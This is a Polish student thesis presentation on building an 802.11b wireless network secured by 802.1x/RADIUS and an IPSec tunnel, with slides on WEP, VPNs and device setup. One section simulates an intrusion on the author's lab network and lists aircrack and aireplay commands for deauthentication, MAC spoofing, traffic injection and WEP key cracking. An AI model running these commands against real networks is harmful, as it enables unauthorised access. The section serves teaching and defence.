310 likes | 579 Views
Projekt sieci WLAN w standardzie 802.11b udost ę pniaj ą cej po łą czenie z sieci ą Internet w oparciu o protokó ł I PSec. Wykonał: Bartosz Zielski Promotor: mgr Wiesław Pyzik. WSTĘP. Komputer jako jednostka w XXI wieku; Sieci radiowe to dobra alternatywa dla LAN;
E N D
Projekt sieci WLAN w standardzie 802.11budostępniającej połączenie z siecią Internet w oparciu o protokół IPSec Wykonał: Bartosz Zielski Promotor: mgr Wiesław Pyzik
WSTĘP • Komputer jako jednostka w XXI wieku; • Sieci radiowe to dobra alternatywa dla LAN; • Mobilność, estetyka, niskie koszty; • Zagrożenia, jakie stwarza korzystanie z sygnału radiowego.
CELE • Skonfigurowanie prostej sieci WLAN 802.11b w oparciu o protokół WEP połączonej z Internetem poprzez bramę (NAT); • Silniejsze zabezpieczenie połączeń radiowych przy wykorzystaniu implementacji protokołów wyższych warstw modelu OSI: • Uwierzytelnienie hostów za pomocą protokołu 802.1x; • Skonfigurowanie tunelu IPSec między hostami a bramą.
SIECI RADIOWE WLAN Topologie • BSS – tryb infrastrukturalny • Oparty o centralny punkt dostępowy i stacje klientów; • Sieć identyfikowana jest poprzez identyfikator SSID; • Po pomyślnym powiązaniu ze stacją kliencką punkt dostępowy pełni rolę pośrednika w komunikacji z resztą sieci. • Pozostałe topologie • IBSS (ad hoc), • ESS.
SIECI RADIOWE WLAN Standardy • Cechy IEEE 802.11b • Działa w zakresie 2,4 GHz na 11 kanałach w modulacji DSSS; • Maksymalna transmisja to 11Mb/s, jednak rzeczywista tylko 6 Mb/s; • Podatny na zakłócenia z powodu dużego zagęszczenia urządzeń radiowych działających w tych samych częstotliwościach; • Duża dostępność kompatybilnych urządzeń. • Pozostałe standardy 802.11 • IEEE 802.11a, • IEEE 802.11g, • IEEE 802.11n.
SIECI RADIOWE WLAN Bezpieczeństwo • Cechy WEP • Protokół szyfrowania, którego zadaniem jest zapewnienie poufności i integralności danych oraz ochrona przed dostępem do infrastruktury sieci; • Wykorzystuje mechanizm klucza wspólnego (o długości 40 i 104 bitów) z symetrycznym szyfrem RC4; • Słabości: błędna implementacja wektora inicjalizacyjnego, brak zarządzania kluczami; • Pozostałe zabezpieczenia • WPA – technologie: TKIP, 802.1x/EAP, PSK; • IEEE 802.11i/WPA2 – WPA + AES.
SIECI RADIOWE WLAN Symulacja włamania • Przygotowania • Sieć WLAN: komputer PC, Punkt Dostępu (NAT, DHCP, WEP, ukrywanie ESSID, filtrowanie MAC); • Intruz: Laptop z kartą sieciową (hermes II), oprogramowanie: Auditor, aircrack (airodump, aireplay, aircrack ),Ethereal; • Cele • Wykrycie ESSID; • Złamanie klucza WEP; • Ominięcie filtrownia adresów MAC.
SIECI RADIOWE WLAN Symulacja włamania • Zbieranie wektorów IV • #iwconfig wlan0 mode monitor • #airodump wlan0 wektory 0
SIECI RADIOWE WLAN Symulacja włamania • Wykrycie ESSID • #aireplay -0 10 -a 00:16:B6:1D:A7:16 wlan0 (druga konsola)
SIECI RADIOWE WLAN Symulacja włamania • Wprowadzenie sztucznego ruchu • #aireplay -1 20 -e kaczogrodA.D.2006 -a 00:16:B6:1D:A7:16 -h 00:30:4F:2A:14:55wlan0 • #aireplay -3 -b 00:16:B6:1D:A7:16 -h 00:30:4F:2A:14:55 -x 700 wlan0
SIECI RADIOWE WLAN Symulacja włamania • Łamanie klucza WEP • #aircrack -0 wektory.ivs
WIRTUALNE SIECI PRYWATNE VPN • Używają publicznej infrastruktury telekomunikacyjnej w celu udostępnienia zdalnym biurom lub też pojedynczym użytkownikom bezpiecznego dostępu do firmowej sieci komputerowej. • Typy • Site-Site, Client-Site. • Architektury • Intranet VPN, Remote Access, Extranet. • Protokoły • IPSec, SSL, L2TP, SSH.
WIRTUALNE SIECI PRYWATNE VPN • Schemat sieci typu Client-Site o architekturze Remote Access.
WIRTUALNE SIECI PRYWATNE VPN Bezpieczeństwo • Poufność danych – zabezpieczenie danych przed ich przeczytaniem lub skopiowaniem przez nieupoważnione osoby; • Integralność danych – zagwarantowanie poprawności i nienaruszalności przesyłanych danych; • Uwierzytelnienie źródła danych – uwierzytelnienie przez odbiorcę źródła przesyłanych pakietów; • Niezaprzeczalność – zweryfikowanie czy nadawca i odbiorca są tymi stronami, które wysyłały i odbierały wiadomości; • Techniki zabezpieczeń • Szyfry symetryczne i asymetryczne, algorytm Diffiego-Hellmana, funkcje skrótu, podpisy cyfrowe, urzędy certyfikacji.
WIRTUALNE SIECI PRYWATNE VPN Protokół IPSec • Ochrona danych realizowana jest na poziomie warstwy 3 modelu OSI; • Ochrona polega na zabezpieczeniu datagramu IP i dodaniu do niego nagłówków ESP lub AH; • Protokół ochrony ESP – szyfruje i częściowo uwierzytelnia dane; • Protokół ochrony AH – tylko uwierzytelnia. • Tryby funkcjonowania • Transportowy (Transport Mode) – pozostają oryginalne nagłówki datagramu IP; • Tunelowania (Tunel Mode) – dodany zostaje nowy nagłówek IP.
WIRTUALNE SIECI PRYWATNE VPN Funkcjonowanie protokołu IPSec • Ustalane są związki bezpieczeństwa SA za pomocą protokołu IKE • Zastosowany protokół, algorytmy i klucze kryptograficzne. • Proces ustalania SA Faza 1 (negocjacja IKE SA) – zestawienie bezpiecznego kanału komunikacji do prowadzenia dalszych negocjacji; • Tryby: Main Mode, Aggressive Mode; • Uwierzytelnienie: Pre-Shared Secret, certyfikaty cyfrowe X.509, XAUTH. • Proces ustalania SA Faza 2 (negocjacja IPSec SA) – uzgodnienie SA do zabezpieczenia transmisji danych.
WIRTUALNE SIECI PRYWATNE VPN Funkcjonowanie protokołu IPSec • Faza 1 IKE – Main Mode
WIRTUALNE SIECI PRYWATNE VPN Funkcjonowanie protokołu IPSec • Faza 2 IKE
KONFIGURACJA URZĄDZEŃ SIECIOWYCHSerwer BRAMA.dyplom.bz • Centralne urządzenie w sieci udostępniające trzy podstawowe usługi: • Dostęp do Internetu dla użytkowników sieci lokalnej; • Serwer DHCP udostępniający podstawowe parametry konfiguracyjne sieci; • Bramka VPN umożliwiająca użytkownikom zestawienie szyfrowanych połączeń. • Oprogramowanie • OS: FreeBSD 5.4; • Usługi: IPFIREWALL, NATD, ISCDHCP3, IPSec, racoon (ipsec-tool).
KONFIGURACJA URZĄDZEŃ SIECIOWYCHSerwer CA.dyplom.bz • Serwer uwierzytelnieniaudostępniający usługi: • Uwierzytelnienia użytkowników przy użyciu protokołu RADIUS; • Urzędu certyfikacji w oparciu o OpenSSL. • Oprogramowanie • OS: FreeBSD 6.0; • Usługi: FreeRADIUS, OpenSSL.
KONFIGURACJA URZĄDZEŃ SIECIOWYCHPunkt dostępu AP.dyplom.bz • Rolą punktu dostępu jest zabezpieczenie połączeń szyfrowaniem WEP oraz kontrola dostępu do medium radiowego: • Szyfrowanie WEP 128 bitów; • Filtrowanie adresów MAC kart sieciowych użytkowników; • Uwierzytelnienie RADIUS. • Produkt firmy LINKSYS model WRT54G v.5 zarządzany przez stronę WWW.
KONFIGURACJA URZĄDZEŃ SIECIOWYCHKomputer PC WINUSER1.dyplom.bz • Funkcją komputera użytkownika jest prawidłowe uwierzytelnienie i zestawienie szyfrowanego tunelu z BRAMĄ. • Instalacja certyfikatów; • Konfiguracja uwierzytelnienia 802.1x; • Utworzenie reguł bezpieczeństwa IPSec. • Oprogramowanie • OS: MS Windows XP SP2; • Usługi: standardowe i wbudowane rozszerzenia systemowe (802.1x i IPSec).
ZESTAWIENIE POŁĄCZEŃ Etap 2 • W pierwszym etapie użytkownik został wstępnie uwierzytelniony i podłączony do sieci radiowej, kolejnym krokiem jest zestawienie szyfrowanego tunelu ESP z serwerem BRAMA.
WNIOSKI • Poprzez użycie dodatkowych mechanizmów bezpieczeństwa zostało wyeliminowane ryzyko wynikające z użycia WEP; • Zastosowane zabezpieczenia obejmują dwie warstwy modelu OSI, przez co są od siebie niezależne; • W przypadku złamania klucza WEP przechwycone pakiety dalej są szyfrowane; • Podłączenie do punktu dostępu wymaga uwierzytelnienia za pomocą certyfikatu; • FIREWALL na serwerze BRAMA zabezpiecza sieć od strony Internetu.